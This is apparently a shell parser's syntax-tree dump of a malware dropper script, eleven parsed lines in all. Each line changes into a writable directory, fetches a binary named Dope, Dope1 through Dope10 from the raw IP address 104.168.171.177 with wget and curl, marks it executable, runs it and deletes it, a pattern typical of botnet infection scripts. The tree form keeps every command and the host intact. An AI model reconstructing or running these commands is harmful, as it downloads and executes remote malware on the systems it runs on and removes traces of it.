ListNode(lineno=2, pos=(12, 172), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://104.168.171.177/Dope'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 136), parts=[
    WordNode(lineno=2, pos=(101, 105), word='curl'),
    WordNode(lineno=2, pos=(106, 108), word='-O'),
    WordNode(lineno=2, pos=(109, 136), word='http://104.168.171.177/Dope'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(136, 137)),
  CommandNode(lineno=2, pos=(138, 151), parts=[
    WordNode(lineno=2, pos=(138, 143), word='chmod'),
    WordNode(lineno=2, pos=(144, 146), word='+x'),
    WordNode(lineno=2, pos=(147, 151), word='Dope'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(151, 152)),
  CommandNode(lineno=2, pos=(153, 159), parts=[
    WordNode(lineno=2, pos=(153, 159), word='./Dope'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(159, 160)),
  CommandNode(lineno=2, pos=(161, 172), parts=[
    WordNode(lineno=2, pos=(161, 163), word='rm'),
    WordNode(lineno=2, pos=(164, 167), word='-rf'),
    WordNode(lineno=2, pos=(168, 172), word='Dope'),
  ]),
])
ListNode(lineno=3, pos=(173, 338), parts=[
  CommandNode(lineno=3, pos=(173, 180), parts=[
    WordNode(lineno=3, pos=(173, 175), word='cd'),
    WordNode(lineno=3, pos=(176, 180), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(181, 183)),
  CommandNode(lineno=3, pos=(184, 195), parts=[
    WordNode(lineno=3, pos=(184, 186), word='cd'),
    WordNode(lineno=3, pos=(187, 195), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(196, 198)),
  CommandNode(lineno=3, pos=(199, 206), parts=[
    WordNode(lineno=3, pos=(199, 201), word='cd'),
    WordNode(lineno=3, pos=(202, 206), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(207, 209)),
  CommandNode(lineno=3, pos=(210, 218), parts=[
    WordNode(lineno=3, pos=(210, 212), word='cd'),
    WordNode(lineno=3, pos=(213, 218), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(219, 221)),
  CommandNode(lineno=3, pos=(222, 226), parts=[
    WordNode(lineno=3, pos=(222, 224), word='cd'),
    WordNode(lineno=3, pos=(225, 226), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(226, 227)),
  CommandNode(lineno=3, pos=(228, 261), parts=[
    WordNode(lineno=3, pos=(228, 232), word='wget'),
    WordNode(lineno=3, pos=(233, 261), word='http://104.168.171.177/Dope1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(261, 262)),
  CommandNode(lineno=3, pos=(263, 299), parts=[
    WordNode(lineno=3, pos=(263, 267), word='curl'),
    WordNode(lineno=3, pos=(268, 270), word='-O'),
    WordNode(lineno=3, pos=(271, 299), word='http://104.168.171.177/Dope1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(299, 300)),
  CommandNode(lineno=3, pos=(301, 315), parts=[
    WordNode(lineno=3, pos=(301, 306), word='chmod'),
    WordNode(lineno=3, pos=(307, 309), word='+x'),
    WordNode(lineno=3, pos=(310, 315), word='Dope1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(315, 316)),
  CommandNode(lineno=3, pos=(317, 324), parts=[
    WordNode(lineno=3, pos=(317, 324), word='./Dope1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(324, 325)),
  CommandNode(lineno=3, pos=(326, 338), parts=[
    WordNode(lineno=3, pos=(326, 328), word='rm'),
    WordNode(lineno=3, pos=(329, 332), word='-rf'),
    WordNode(lineno=3, pos=(333, 338), word='Dope1'),
  ]),
])
ListNode(lineno=4, pos=(339, 504), parts=[
  CommandNode(lineno=4, pos=(339, 346), parts=[
    WordNode(lineno=4, pos=(339, 341), word='cd'),
    WordNode(lineno=4, pos=(342, 346), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(347, 349)),
  CommandNode(lineno=4, pos=(350, 361), parts=[
    WordNode(lineno=4, pos=(350, 352), word='cd'),
    WordNode(lineno=4, pos=(353, 361), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(362, 364)),
  CommandNode(lineno=4, pos=(365, 372), parts=[
    WordNode(lineno=4, pos=(365, 367), word='cd'),
    WordNode(lineno=4, pos=(368, 372), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(373, 375)),
  CommandNode(lineno=4, pos=(376, 384), parts=[
    WordNode(lineno=4, pos=(376, 378), word='cd'),
    WordNode(lineno=4, pos=(379, 384), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(385, 387)),
  CommandNode(lineno=4, pos=(388, 392), parts=[
    WordNode(lineno=4, pos=(388, 390), word='cd'),
    WordNode(lineno=4, pos=(391, 392), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(392, 393)),
  CommandNode(lineno=4, pos=(394, 427), parts=[
    WordNode(lineno=4, pos=(394, 398), word='wget'),
    WordNode(lineno=4, pos=(399, 427), word='http://104.168.171.177/Dope2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(427, 428)),
  CommandNode(lineno=4, pos=(429, 465), parts=[
    WordNode(lineno=4, pos=(429, 433), word='curl'),
    WordNode(lineno=4, pos=(434, 436), word='-O'),
    WordNode(lineno=4, pos=(437, 465), word='http://104.168.171.177/Dope2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(465, 466)),
  CommandNode(lineno=4, pos=(467, 481), parts=[
    WordNode(lineno=4, pos=(467, 472), word='chmod'),
    WordNode(lineno=4, pos=(473, 475), word='+x'),
    WordNode(lineno=4, pos=(476, 481), word='Dope2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(481, 482)),
  CommandNode(lineno=4, pos=(483, 490), parts=[
    WordNode(lineno=4, pos=(483, 490), word='./Dope2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(490, 491)),
  CommandNode(lineno=4, pos=(492, 504), parts=[
    WordNode(lineno=4, pos=(492, 494), word='rm'),
    WordNode(lineno=4, pos=(495, 498), word='-rf'),
    WordNode(lineno=4, pos=(499, 504), word='Dope2'),
  ]),
])
ListNode(lineno=5, pos=(505, 670), parts=[
  CommandNode(lineno=5, pos=(505, 512), parts=[
    WordNode(lineno=5, pos=(505, 507), word='cd'),
    WordNode(lineno=5, pos=(508, 512), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(513, 515)),
  CommandNode(lineno=5, pos=(516, 527), parts=[
    WordNode(lineno=5, pos=(516, 518), word='cd'),
    WordNode(lineno=5, pos=(519, 527), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(528, 530)),
  CommandNode(lineno=5, pos=(531, 538), parts=[
    WordNode(lineno=5, pos=(531, 533), word='cd'),
    WordNode(lineno=5, pos=(534, 538), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(539, 541)),
  CommandNode(lineno=5, pos=(542, 550), parts=[
    WordNode(lineno=5, pos=(542, 544), word='cd'),
    WordNode(lineno=5, pos=(545, 550), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(551, 553)),
  CommandNode(lineno=5, pos=(554, 558), parts=[
    WordNode(lineno=5, pos=(554, 556), word='cd'),
    WordNode(lineno=5, pos=(557, 558), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(558, 559)),
  CommandNode(lineno=5, pos=(560, 593), parts=[
    WordNode(lineno=5, pos=(560, 564), word='wget'),
    WordNode(lineno=5, pos=(565, 593), word='http://104.168.171.177/Dope3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(593, 594)),
  CommandNode(lineno=5, pos=(595, 631), parts=[
    WordNode(lineno=5, pos=(595, 599), word='curl'),
    WordNode(lineno=5, pos=(600, 602), word='-O'),
    WordNode(lineno=5, pos=(603, 631), word='http://104.168.171.177/Dope3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(631, 632)),
  CommandNode(lineno=5, pos=(633, 647), parts=[
    WordNode(lineno=5, pos=(633, 638), word='chmod'),
    WordNode(lineno=5, pos=(639, 641), word='+x'),
    WordNode(lineno=5, pos=(642, 647), word='Dope3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(647, 648)),
  CommandNode(lineno=5, pos=(649, 656), parts=[
    WordNode(lineno=5, pos=(649, 656), word='./Dope3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(656, 657)),
  CommandNode(lineno=5, pos=(658, 670), parts=[
    WordNode(lineno=5, pos=(658, 660), word='rm'),
    WordNode(lineno=5, pos=(661, 664), word='-rf'),
    WordNode(lineno=5, pos=(665, 670), word='Dope3'),
  ]),
])
ListNode(lineno=6, pos=(671, 836), parts=[
  CommandNode(lineno=6, pos=(671, 678), parts=[
    WordNode(lineno=6, pos=(671, 673), word='cd'),
    WordNode(lineno=6, pos=(674, 678), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(679, 681)),
  CommandNode(lineno=6, pos=(682, 693), parts=[
    WordNode(lineno=6, pos=(682, 684), word='cd'),
    WordNode(lineno=6, pos=(685, 693), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(694, 696)),
  CommandNode(lineno=6, pos=(697, 704), parts=[
    WordNode(lineno=6, pos=(697, 699), word='cd'),
    WordNode(lineno=6, pos=(700, 704), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(705, 707)),
  CommandNode(lineno=6, pos=(708, 716), parts=[
    WordNode(lineno=6, pos=(708, 710), word='cd'),
    WordNode(lineno=6, pos=(711, 716), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(717, 719)),
  CommandNode(lineno=6, pos=(720, 724), parts=[
    WordNode(lineno=6, pos=(720, 722), word='cd'),
    WordNode(lineno=6, pos=(723, 724), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(724, 725)),
  CommandNode(lineno=6, pos=(726, 759), parts=[
    WordNode(lineno=6, pos=(726, 730), word='wget'),
    WordNode(lineno=6, pos=(731, 759), word='http://104.168.171.177/Dope4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(759, 760)),
  CommandNode(lineno=6, pos=(761, 797), parts=[
    WordNode(lineno=6, pos=(761, 765), word='curl'),
    WordNode(lineno=6, pos=(766, 768), word='-O'),
    WordNode(lineno=6, pos=(769, 797), word='http://104.168.171.177/Dope4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(797, 798)),
  CommandNode(lineno=6, pos=(799, 813), parts=[
    WordNode(lineno=6, pos=(799, 804), word='chmod'),
    WordNode(lineno=6, pos=(805, 807), word='+x'),
    WordNode(lineno=6, pos=(808, 813), word='Dope4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(813, 814)),
  CommandNode(lineno=6, pos=(815, 822), parts=[
    WordNode(lineno=6, pos=(815, 822), word='./Dope4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(822, 823)),
  CommandNode(lineno=6, pos=(824, 836), parts=[
    WordNode(lineno=6, pos=(824, 826), word='rm'),
    WordNode(lineno=6, pos=(827, 830), word='-rf'),
    WordNode(lineno=6, pos=(831, 836), word='Dope4'),
  ]),
])
ListNode(lineno=7, pos=(837, 1002), parts=[
  CommandNode(lineno=7, pos=(837, 844), parts=[
    WordNode(lineno=7, pos=(837, 839), word='cd'),
    WordNode(lineno=7, pos=(840, 844), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(845, 847)),
  CommandNode(lineno=7, pos=(848, 859), parts=[
    WordNode(lineno=7, pos=(848, 850), word='cd'),
    WordNode(lineno=7, pos=(851, 859), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(860, 862)),
  CommandNode(lineno=7, pos=(863, 870), parts=[
    WordNode(lineno=7, pos=(863, 865), word='cd'),
    WordNode(lineno=7, pos=(866, 870), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(871, 873)),
  CommandNode(lineno=7, pos=(874, 882), parts=[
    WordNode(lineno=7, pos=(874, 876), word='cd'),
    WordNode(lineno=7, pos=(877, 882), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(883, 885)),
  CommandNode(lineno=7, pos=(886, 890), parts=[
    WordNode(lineno=7, pos=(886, 888), word='cd'),
    WordNode(lineno=7, pos=(889, 890), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(890, 891)),
  CommandNode(lineno=7, pos=(892, 925), parts=[
    WordNode(lineno=7, pos=(892, 896), word='wget'),
    WordNode(lineno=7, pos=(897, 925), word='http://104.168.171.177/Dope5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(925, 926)),
  CommandNode(lineno=7, pos=(927, 963), parts=[
    WordNode(lineno=7, pos=(927, 931), word='curl'),
    WordNode(lineno=7, pos=(932, 934), word='-O'),
    WordNode(lineno=7, pos=(935, 963), word='http://104.168.171.177/Dope5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(963, 964)),
  CommandNode(lineno=7, pos=(965, 979), parts=[
    WordNode(lineno=7, pos=(965, 970), word='chmod'),
    WordNode(lineno=7, pos=(971, 973), word='+x'),
    WordNode(lineno=7, pos=(974, 979), word='Dope5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(979, 980)),
  CommandNode(lineno=7, pos=(981, 988), parts=[
    WordNode(lineno=7, pos=(981, 988), word='./Dope5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(988, 989)),
  CommandNode(lineno=7, pos=(990, 1002), parts=[
    WordNode(lineno=7, pos=(990, 992), word='rm'),
    WordNode(lineno=7, pos=(993, 996), word='-rf'),
    WordNode(lineno=7, pos=(997, 1002), word='Dope5'),
  ]),
])
ListNode(lineno=8, pos=(1003, 1168), parts=[
  CommandNode(lineno=8, pos=(1003, 1010), parts=[
    WordNode(lineno=8, pos=(1003, 1005), word='cd'),
    WordNode(lineno=8, pos=(1006, 1010), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1011, 1013)),
  CommandNode(lineno=8, pos=(1014, 1025), parts=[
    WordNode(lineno=8, pos=(1014, 1016), word='cd'),
    WordNode(lineno=8, pos=(1017, 1025), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1026, 1028)),
  CommandNode(lineno=8, pos=(1029, 1036), parts=[
    WordNode(lineno=8, pos=(1029, 1031), word='cd'),
    WordNode(lineno=8, pos=(1032, 1036), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1037, 1039)),
  CommandNode(lineno=8, pos=(1040, 1048), parts=[
    WordNode(lineno=8, pos=(1040, 1042), word='cd'),
    WordNode(lineno=8, pos=(1043, 1048), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1049, 1051)),
  CommandNode(lineno=8, pos=(1052, 1056), parts=[
    WordNode(lineno=8, pos=(1052, 1054), word='cd'),
    WordNode(lineno=8, pos=(1055, 1056), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1056, 1057)),
  CommandNode(lineno=8, pos=(1058, 1091), parts=[
    WordNode(lineno=8, pos=(1058, 1062), word='wget'),
    WordNode(lineno=8, pos=(1063, 1091), word='http://104.168.171.177/Dope6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1091, 1092)),
  CommandNode(lineno=8, pos=(1093, 1129), parts=[
    WordNode(lineno=8, pos=(1093, 1097), word='curl'),
    WordNode(lineno=8, pos=(1098, 1100), word='-O'),
    WordNode(lineno=8, pos=(1101, 1129), word='http://104.168.171.177/Dope6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1129, 1130)),
  CommandNode(lineno=8, pos=(1131, 1145), parts=[
    WordNode(lineno=8, pos=(1131, 1136), word='chmod'),
    WordNode(lineno=8, pos=(1137, 1139), word='+x'),
    WordNode(lineno=8, pos=(1140, 1145), word='Dope6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1145, 1146)),
  CommandNode(lineno=8, pos=(1147, 1154), parts=[
    WordNode(lineno=8, pos=(1147, 1154), word='./Dope6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1154, 1155)),
  CommandNode(lineno=8, pos=(1156, 1168), parts=[
    WordNode(lineno=8, pos=(1156, 1158), word='rm'),
    WordNode(lineno=8, pos=(1159, 1162), word='-rf'),
    WordNode(lineno=8, pos=(1163, 1168), word='Dope6'),
  ]),
])
ListNode(lineno=9, pos=(1169, 1334), parts=[
  CommandNode(lineno=9, pos=(1169, 1176), parts=[
    WordNode(lineno=9, pos=(1169, 1171), word='cd'),
    WordNode(lineno=9, pos=(1172, 1176), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1177, 1179)),
  CommandNode(lineno=9, pos=(1180, 1191), parts=[
    WordNode(lineno=9, pos=(1180, 1182), word='cd'),
    WordNode(lineno=9, pos=(1183, 1191), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1192, 1194)),
  CommandNode(lineno=9, pos=(1195, 1202), parts=[
    WordNode(lineno=9, pos=(1195, 1197), word='cd'),
    WordNode(lineno=9, pos=(1198, 1202), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1203, 1205)),
  CommandNode(lineno=9, pos=(1206, 1214), parts=[
    WordNode(lineno=9, pos=(1206, 1208), word='cd'),
    WordNode(lineno=9, pos=(1209, 1214), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1215, 1217)),
  CommandNode(lineno=9, pos=(1218, 1222), parts=[
    WordNode(lineno=9, pos=(1218, 1220), word='cd'),
    WordNode(lineno=9, pos=(1221, 1222), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1222, 1223)),
  CommandNode(lineno=9, pos=(1224, 1257), parts=[
    WordNode(lineno=9, pos=(1224, 1228), word='wget'),
    WordNode(lineno=9, pos=(1229, 1257), word='http://104.168.171.177/Dope7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1257, 1258)),
  CommandNode(lineno=9, pos=(1259, 1295), parts=[
    WordNode(lineno=9, pos=(1259, 1263), word='curl'),
    WordNode(lineno=9, pos=(1264, 1266), word='-O'),
    WordNode(lineno=9, pos=(1267, 1295), word='http://104.168.171.177/Dope7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1295, 1296)),
  CommandNode(lineno=9, pos=(1297, 1311), parts=[
    WordNode(lineno=9, pos=(1297, 1302), word='chmod'),
    WordNode(lineno=9, pos=(1303, 1305), word='+x'),
    WordNode(lineno=9, pos=(1306, 1311), word='Dope7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1311, 1312)),
  CommandNode(lineno=9, pos=(1313, 1320), parts=[
    WordNode(lineno=9, pos=(1313, 1320), word='./Dope7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1320, 1321)),
  CommandNode(lineno=9, pos=(1322, 1334), parts=[
    WordNode(lineno=9, pos=(1322, 1324), word='rm'),
    WordNode(lineno=9, pos=(1325, 1328), word='-rf'),
    WordNode(lineno=9, pos=(1329, 1334), word='Dope7'),
  ]),
])
ListNode(lineno=10, pos=(1335, 1500), parts=[
  CommandNode(lineno=10, pos=(1335, 1342), parts=[
    WordNode(lineno=10, pos=(1335, 1337), word='cd'),
    WordNode(lineno=10, pos=(1338, 1342), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1343, 1345)),
  CommandNode(lineno=10, pos=(1346, 1357), parts=[
    WordNode(lineno=10, pos=(1346, 1348), word='cd'),
    WordNode(lineno=10, pos=(1349, 1357), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1358, 1360)),
  CommandNode(lineno=10, pos=(1361, 1368), parts=[
    WordNode(lineno=10, pos=(1361, 1363), word='cd'),
    WordNode(lineno=10, pos=(1364, 1368), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1369, 1371)),
  CommandNode(lineno=10, pos=(1372, 1380), parts=[
    WordNode(lineno=10, pos=(1372, 1374), word='cd'),
    WordNode(lineno=10, pos=(1375, 1380), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1381, 1383)),
  CommandNode(lineno=10, pos=(1384, 1388), parts=[
    WordNode(lineno=10, pos=(1384, 1386), word='cd'),
    WordNode(lineno=10, pos=(1387, 1388), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1388, 1389)),
  CommandNode(lineno=10, pos=(1390, 1423), parts=[
    WordNode(lineno=10, pos=(1390, 1394), word='wget'),
    WordNode(lineno=10, pos=(1395, 1423), word='http://104.168.171.177/Dope8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1423, 1424)),
  CommandNode(lineno=10, pos=(1425, 1461), parts=[
    WordNode(lineno=10, pos=(1425, 1429), word='curl'),
    WordNode(lineno=10, pos=(1430, 1432), word='-O'),
    WordNode(lineno=10, pos=(1433, 1461), word='http://104.168.171.177/Dope8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1461, 1462)),
  CommandNode(lineno=10, pos=(1463, 1477), parts=[
    WordNode(lineno=10, pos=(1463, 1468), word='chmod'),
    WordNode(lineno=10, pos=(1469, 1471), word='+x'),
    WordNode(lineno=10, pos=(1472, 1477), word='Dope8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1477, 1478)),
  CommandNode(lineno=10, pos=(1479, 1486), parts=[
    WordNode(lineno=10, pos=(1479, 1486), word='./Dope8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1486, 1487)),
  CommandNode(lineno=10, pos=(1488, 1500), parts=[
    WordNode(lineno=10, pos=(1488, 1490), word='rm'),
    WordNode(lineno=10, pos=(1491, 1494), word='-rf'),
    WordNode(lineno=10, pos=(1495, 1500), word='Dope8'),
  ]),
])
ListNode(lineno=11, pos=(1501, 1666), parts=[
  CommandNode(lineno=11, pos=(1501, 1508), parts=[
    WordNode(lineno=11, pos=(1501, 1503), word='cd'),
    WordNode(lineno=11, pos=(1504, 1508), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1509, 1511)),
  CommandNode(lineno=11, pos=(1512, 1523), parts=[
    WordNode(lineno=11, pos=(1512, 1514), word='cd'),
    WordNode(lineno=11, pos=(1515, 1523), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1524, 1526)),
  CommandNode(lineno=11, pos=(1527, 1534), parts=[
    WordNode(lineno=11, pos=(1527, 1529), word='cd'),
    WordNode(lineno=11, pos=(1530, 1534), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1535, 1537)),
  CommandNode(lineno=11, pos=(1538, 1546), parts=[
    WordNode(lineno=11, pos=(1538, 1540), word='cd'),
    WordNode(lineno=11, pos=(1541, 1546), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1547, 1549)),
  CommandNode(lineno=11, pos=(1550, 1554), parts=[
    WordNode(lineno=11, pos=(1550, 1552), word='cd'),
    WordNode(lineno=11, pos=(1553, 1554), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1554, 1555)),
  CommandNode(lineno=11, pos=(1556, 1589), parts=[
    WordNode(lineno=11, pos=(1556, 1560), word='wget'),
    WordNode(lineno=11, pos=(1561, 1589), word='http://104.168.171.177/Dope9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1589, 1590)),
  CommandNode(lineno=11, pos=(1591, 1627), parts=[
    WordNode(lineno=11, pos=(1591, 1595), word='curl'),
    WordNode(lineno=11, pos=(1596, 1598), word='-O'),
    WordNode(lineno=11, pos=(1599, 1627), word='http://104.168.171.177/Dope9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1627, 1628)),
  CommandNode(lineno=11, pos=(1629, 1643), parts=[
    WordNode(lineno=11, pos=(1629, 1634), word='chmod'),
    WordNode(lineno=11, pos=(1635, 1637), word='+x'),
    WordNode(lineno=11, pos=(1638, 1643), word='Dope9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1643, 1644)),
  CommandNode(lineno=11, pos=(1645, 1652), parts=[
    WordNode(lineno=11, pos=(1645, 1652), word='./Dope9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1652, 1653)),
  CommandNode(lineno=11, pos=(1654, 1666), parts=[
    WordNode(lineno=11, pos=(1654, 1656), word='rm'),
    WordNode(lineno=11, pos=(1657, 1660), word='-rf'),
    WordNode(lineno=11, pos=(1661, 1666), word='Dope9'),
  ]),
])
ListNode(lineno=12, pos=(1667, 1837), parts=[
  CommandNode(lineno=12, pos=(1667, 1674), parts=[
    WordNode(lineno=12, pos=(1667, 1669), word='cd'),
    WordNode(lineno=12, pos=(1670, 1674), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1675, 1677)),
  CommandNode(lineno=12, pos=(1678, 1689), parts=[
    WordNode(lineno=12, pos=(1678, 1680), word='cd'),
    WordNode(lineno=12, pos=(1681, 1689), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1690, 1692)),
  CommandNode(lineno=12, pos=(1693, 1700), parts=[
    WordNode(lineno=12, pos=(1693, 1695), word='cd'),
    WordNode(lineno=12, pos=(1696, 1700), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1701, 1703)),
  CommandNode(lineno=12, pos=(1704, 1712), parts=[
    WordNode(lineno=12, pos=(1704, 1706), word='cd'),
    WordNode(lineno=12, pos=(1707, 1712), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1713, 1715)),
  CommandNode(lineno=12, pos=(1716, 1720), parts=[
    WordNode(lineno=12, pos=(1716, 1718), word='cd'),
    WordNode(lineno=12, pos=(1719, 1720), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1720, 1721)),
  CommandNode(lineno=12, pos=(1722, 1756), parts=[
    WordNode(lineno=12, pos=(1722, 1726), word='wget'),
    WordNode(lineno=12, pos=(1727, 1756), word='http://104.168.171.177/Dope10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1756, 1757)),
  CommandNode(lineno=12, pos=(1758, 1795), parts=[
    WordNode(lineno=12, pos=(1758, 1762), word='curl'),
    WordNode(lineno=12, pos=(1763, 1765), word='-O'),
    WordNode(lineno=12, pos=(1766, 1795), word='http://104.168.171.177/Dope10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1795, 1796)),
  CommandNode(lineno=12, pos=(1797, 1812), parts=[
    WordNode(lineno=12, pos=(1797, 1802), word='chmod'),
    WordNode(lineno=12, pos=(1803, 1805), word='+x'),
    WordNode(lineno=12, pos=(1806, 1812), word='Dope10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1812, 1813)),
  CommandNode(lineno=12, pos=(1814, 1822), parts=[
    WordNode(lineno=12, pos=(1814, 1822), word='./Dope10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1822, 1823)),
  CommandNode(lineno=12, pos=(1824, 1837), parts=[
    WordNode(lineno=12, pos=(1824, 1826), word='rm'),
    WordNode(lineno=12, pos=(1827, 1830), word='-rf'),
    WordNode(lineno=12, pos=(1831, 1837), word='Dope10'),
  ]),
])
